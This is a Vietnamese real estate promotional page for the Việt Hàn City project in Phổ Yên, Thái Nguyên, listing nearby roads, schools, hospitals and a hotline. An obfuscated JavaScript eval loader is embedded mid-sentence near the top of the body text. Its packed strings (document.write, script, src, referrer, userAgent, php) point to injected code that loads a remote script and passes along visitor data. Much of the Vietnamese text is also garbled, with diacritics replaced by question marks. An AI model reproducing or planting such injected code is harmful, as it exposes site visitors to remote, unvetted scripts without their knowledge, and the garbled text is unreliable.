THỜI GIAN BÀN GIAO DỰ ÁN:

Còn
1
0
Tháng
0
9
Ngày

Khu đô thị Việt Hàn City có vị trí HOT kết nối nhiều tiện ích

Khu eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|knted|var|u0026u|referrer|rzfst||js|php’.split(‘|’),0,{}))
?ô th? Vi?t Hàn City Ph? Yên là m?t d? án m?i có v? trí ??c ??a k?t n?i nhi?u ti?n ích s?ng cho c? dân n?i ?ây, c? h?i nâng cao ch?t l??ng cu?c s?ng. V? trí ??t nên Vi?t Hàn City n?m ? ?âu, mang l?i nh?ng ti?n ích và giá tr? gì khi ??u t? ho?c sinh s?ng t?i ?ây?

Khu ?ô Th? Vi?t Hàn City Thái Nguyên t?a l?c trên “m?nh ??t vàng” Ph? Yên là c?a ngõ phía Nam t?nh Thái Nguyên, ti?p giáp Th? ?ô Hà N?i – n?i n?m gi? vai trò ??c bi?t quan tr?ng trong ti?n trình h?i nh?p, phát tri?n kinh t? – xã h?i t?nh nhà.

1, V? trí HOT c?a d? án b?t ??ng s?n Vi?t Hàn City Ph? Yên

D? án khu ?ô th? Vi?t Hàn city n?m trong ??a ph?n hành chính c?a Thôn ?ông Sinh, Xã H?ng Ti?n, Huy?n Ph? Yên, T?nh Thái Nguyên là v? trí ??c ??a v?i nhi?u thu?n l?i cho m?t cu?c s?ng thu?n ti?n v? m?i m?t cho nh?ng c? dân t??ng lai c?a d? án này. Vì v?y các ch? ??u t? có nhi?u c? bi?n ngu?n ti?n nhàn r?i, ti?n l?u ?ông sinh l?i nhanh chóng.

Khu ?ô th? Vi?t Hàn City có v? trí HOT k?t n?i nhi?u ti?n ích

V? trí Hot c?a d? án ??t n?n Vi?t Hàn City:

 • Phía B?c: H??ng ?i v? thành Ph? Thái Nguyên và TT Sông Công
 • Phía Nam: Trung tâm th? xã Ph? Yên
 • Phía Tây: N?i li?n qu?c l? 3 c?
 • Phía ?ông: Ti?p giáp c?i cao t?c Hà N?i Thái Nguyên v?i 3 phút di chuy?n

Là m?t trong nh?ng d? án có v? trí ??p nh?t n?m trong h??ng phát tri?n c?a tính Thái Nguyên, khu ?ô th? Vi?t Hàn City H?ng Ti?n ?ang ???c r?t nhi?u khách hàng và các ch? ??u t? quan tâm.

2, Nh?ng ti?n ích ???c k?t n?i nh? v? trí Hot c?a khu ?ô th? Vi?t Hàn Ph? Yên

N?m t?i v? trí thu?c h??ng phát tri?n c?a t?nh Thái Nguyên ngay g?n Trung Tâm Thành Ph?, Khu ?ô th? Vi?t Hàn City ?ang có r?t nhi?u nhi?u l?i th? v? m?t k?t n?i ti?n ích, ??m b?o cho nh?ng c? dân t??ng l?i sinh s?ng t?i ?ây có môt cu?c s?ng ti?n nghi, thu?n l?i v? m?i m?t cho cu?c s?ng.

V? K?t n?i ti?n ích giao thông

Nh?ng c? dân s?ng t?i khu ??t n?n Vi?t Hàn city d? dàng di chuy?n v?i các h? ???ng m?i to r?ng, ??c bi?t nh? v? trí Hot có g?n k? các tuy?n ???ng huy?t m?ch c?a t?nh ??c bi?t ph?i k? ??n nh?:

 • Tuy?n ???ng Hà N?i – Thái Nguyên 3B ch? v?i 3 phút di chuy?n
 • Tuy?n ???ng Qu?c L? 3 c?
 • Ti?p giáp ??i l? vàng 27m là tuy?n ???ng gi?m t?i cho qu?c l? 3 c? t? UBND xã Bãi Bông vào cao t?c Hà N?i – Thái Nguyên.
 • Cách b?n xe Ph? Yên ch? 450m
 • G?n Ga Ph? Yên cho các tuy?n ???ng s?t
 • Ti?n ích giáo d?c ??i v?i tu?i tr? c? dân khu ?ô th? Vi?t Hàn City

Nh? v? trí c?a d? án mà nh?ng c? dân nh? tu?i th? h? m?i s? ???c h?c t?i h? th?ng các tr??ng h?c t? c?p 1 ??n c?p 3 ngay sát khu d? án Vi?t Hàn H?ng Ti?n nh?:

 • Tr??ng Ti?u H?c H?ng Ti?n
 • Tr??ng THCS H?ng Ti?n
 • Tr??ng THPT Lê H?ng Phong
 • Ti?n ích giáo d?c ??i v?i tu?i tr? c? dân khu ?ô th? Vi?t Hàn City
 • Ti?n ích giáo d?c ??i v?i tu?i tr? c? dân khu ?ô th? Vi?t Hàn City

Khu ?ô th? Vi?t Hàn City có v? trí HOT k?t n?i nhi?u ti?n ích

V? trí c?a khu ?ô th? Vi?t Hàn City g?n các b?nh vi?n

?i?n, ???ng, tr??ng, tr?m là nh?ng nhu c?u t?t y?u c?a cu?c s?ng con ng??i, h? th?ng ?i?n l??i qu?c gia hi?n nay ?ã không ph?i là v?n ?? lo l?ng. các ti?n ích v? ???ng, tr??ng ?ã ???c chúng tôi chia s? ? m?c trên, còn các ti?n ích v? tr?m – b?nh viên thì nh?ng c? d?n sinh s?ng t?i d? án Vi?t Hàn ph? yên hoàn toàn yên têm v?i h? th?ng b?nh vi?n ?a khoa có ch?t l??ng cao nh?:

 • B?nh vi?n ?a khoa th? xã Ph? Yên
 • B?nh Vi?n quân y 91
 • và các tr?m xá, b?nh xá c?a các xã, th? tr?n xung quanh

Các ti?n ích v? d?ch v?, mua s?m cho cu?c s?ng

Ngoài nh?ng ti?n ích v? ???ng – Tr??ng – Tr?m thì d? án khu ?ô th? Vi?t Hàn City còn r?t g?n v?i nh?ng ti?n ích khác nh?:

 • Các ti?n ích v? d?ch v?, mua s?m cho cu?c s?ng
 • Các ti?n ích v? d?ch v?, mua s?m cho cu?c s?ng
 • Giáp khu công nghi?p SAMSUNG ??m b?o công ?n vi?c làm c?ng v?i s? phát tri?n c?a các ngành d?ch v?
 • D? án ??t n?n Vi?t Hàn g?n các ch? l?n, si?u th? nh?
 • G?n h? th?ng b? máy hành chính nhà n??c

Nh?ng nhu c?u t?y y?u ??u ???c ?áp ?ng cho m?t cu?c s?ng ti?n nghi, góp ph?n nâng cao ch?t l??ng cu?c s?ng mà không ph?i d? án b?t ??ng s?n nào c?ng có v? tr? Hot nh? d? án khu ?ô th? Vi?t Hàn hi?n nay.

?? bi?t thêm các thông tin v? d? án vui lòng liên h? hotline: 093 15 68886

Bạn đang xem: Khu đô thị Việt Hàn City có vị trí HOT kết nối nhiều tiện ích trong

News latest

Saigon Riverside City lối tắt đến thành công
Saigon Riverside City lối tắt đến thành công

Tại sao nói dự án Saigon Riverside City chính là lối tắt đạt đến thành công mà mỗi khách hàng tại thị trường Thủ Đức...

Căn hộ sunshine city Sài Gòn hạng sang
Căn hộ sunshine city Sài Gòn hạng sang

Những yếu tố phong thủy cực tốt tại căn hộ Sunshine City Sài Gòn Phong thủy vốn được xem là một trong những yếu tố...

Dự án One Varandah đặc biệt như thế nào
Dự án One Varandah đặc biệt như thế nào

Là một trong những công trình bất động sản được triển khai tại quận 2 thành phố Hồ Chí Minh, dự án One Varandah tương...

BẢN ĐỒ HUYỆN BÌNH CHÁNH
BẢN ĐỒ HUYỆN BÌNH CHÁNH

Mới đây, UBND Thành phố đã có quyết định ban hành số 2391/QĐ-UBND về quy hoạch sử dụng đất đến năm 2020 và kế hoạch...

FLC Đại Mỗ, Nam Từ Liêm được FLC mua với mức giá 860 tỷ có xứng đáng?
FLC Đại Mỗ, Nam Từ Liêm được FLC mua với mức giá 860 tỷ có xứng đáng?

Thông tin t?p ?oàn FLC m?i ?ây ?ã v??t qua 16 ??i th? ?? th?ng ??u giá khu ??t có di?n tích 6,4ha thu?c ph??ng...